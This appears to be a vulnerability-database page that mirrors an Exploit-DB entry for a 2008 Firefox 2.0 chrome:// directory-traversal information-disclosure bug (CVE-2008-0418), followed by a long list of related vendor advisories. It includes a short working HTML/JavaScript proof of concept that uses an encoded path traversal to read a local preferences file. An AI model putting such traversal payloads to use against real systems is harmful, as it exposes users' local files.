Lucene search
Gerry EisenhaurEDB-ID:31051HistoryJan 19, 2008 - 12:00 a.m.
Mozilla Firefox 2.0 - 'chrome://' URI JavaScript File Request Information Disclosure
2008-01-1900:00:00
Gerry Eisenhaur
www.exploit-db.com
26
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/27406/info
Mozilla Firefox is prone to an information-disclosure vulnerability because it fails to restrict access to local JavaScript, images and stylesheets files.
Attackers can exploit this issue to gain access to potentially sensitive information that could aid in further attacks.
Firefox 2.0.0.11 is vulnerable; other versions may also be affected.
NOTE: For an exploit to succeed, a user must have an addon installed that does not store its contents in a '.jar' file. The attacker would have to target a specific addon that uses "flat" packaging.
<script>pref = function(x, y){document.write(x + ' -> ' + y + '<br>');};</script> <script src='chrome://downbar/content/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fProgram%20Files%2fMozilla%20Thunderbird%2fgreprefs%2fall.js'></script> Related
cert
cert
Mozilla products may allow directory traversal
2008-02-11 00:00:00
nvd
nvd
CVE-2008-0418
2008-02-08 22:00:00
ubuntucve
ubuntucve
CVE-2008-0418
2008-02-08 00:00:00
cvelist
cvelist
CVE-2008-0418
2008-02-08 21:00:00
veracode
veracode
Information Disclosure
2020-04-10 00:19:46
mozilla
mozilla
Directory traversal via chrome: URI — Mozilla
2008-02-07 00:00:00
prion
prion
Directory traversal
2008-02-08 22:00:00
securityvulns
securityvulns
Mozilla Foundation Security Advisory 2008-05
2008-02-10 00:00:00
Mozilla Firefox / Thunderbird / Seamonkey multiple security vulonerabilities
2008-02-11 00:00:00
cve
cve
CVE-2008-0418
2008-02-08 22:00:00
nessus
nessus
Mozilla Thunderbird < 2.0.0.12 Multiple Vulnerabilities
2008-02-27 00:00:00
Mandriva Linux Security Advisory : mozilla-thunderbird (MDVSA-2008:062)
2009-04-23 00:00:00
openvas
openvas
Slackware: Security Advisory (SSA:2008-061-01)
2012-09-10 00:00:00
Slackware Advisory SSA:2008-061-01 mozilla-thunderbird
2012-09-11 00:00:00
Ubuntu Update for mozilla-thunderbird, thunderbird vulnerabilities USN-582-1
2009-03-23 00:00:00
slackware
slackware
[slackware-security] mozilla-thunderbird
2008-03-01 23:36:00
ubuntu
ubuntu
Thunderbird regression
2008-03-06 00:00:00
Thunderbird vulnerabilities
2008-02-29 00:00:00
osv
osv
icedove - several vulnerabilities
2008-02-10 00:00:00
fedora
fedora
[SECURITY] Fedora 8 Update: thunderbird-2.0.0.12-1.fc8
2008-02-28 21:38:54
[SECURITY] Fedora 8 Update: seamonkey-1.1.8-1.fc8
2008-02-13 04:53:43
[SECURITY] Fedora 7 Update: seamonkey-1.1.8-1.fc7
2008-02-13 15:10:50
oraclelinux
oraclelinux
Moderate: thunderbird security update
2008-02-08 00:00:00
Critical: firefox security update
2008-02-08 00:00:00
redhat
redhat
(RHSA-2008:0105) Critical: thunderbird security update
2008-02-07 00:00:00
(RHSA-2008:0103) Critical: firefox security update
2008-02-07 00:00:00
centos
centos
thunderbird security update
2008-02-08 19:19:22
firefox security update
2008-02-08 19:18:05
seamonkey security update
2008-02-08 19:04:30
debian
debian
[SECURITY] [DSA 1506-2] New iceape packages fix regression
2008-03-20 01:41:06
[SECURITY] [DSA 1506-1] New iceape packages fix several vulnerabilities
2008-02-24 12:30:41
suse
suse
remote code execution in MozillaFirefox,seamonkey
2008-02-15 17:07:07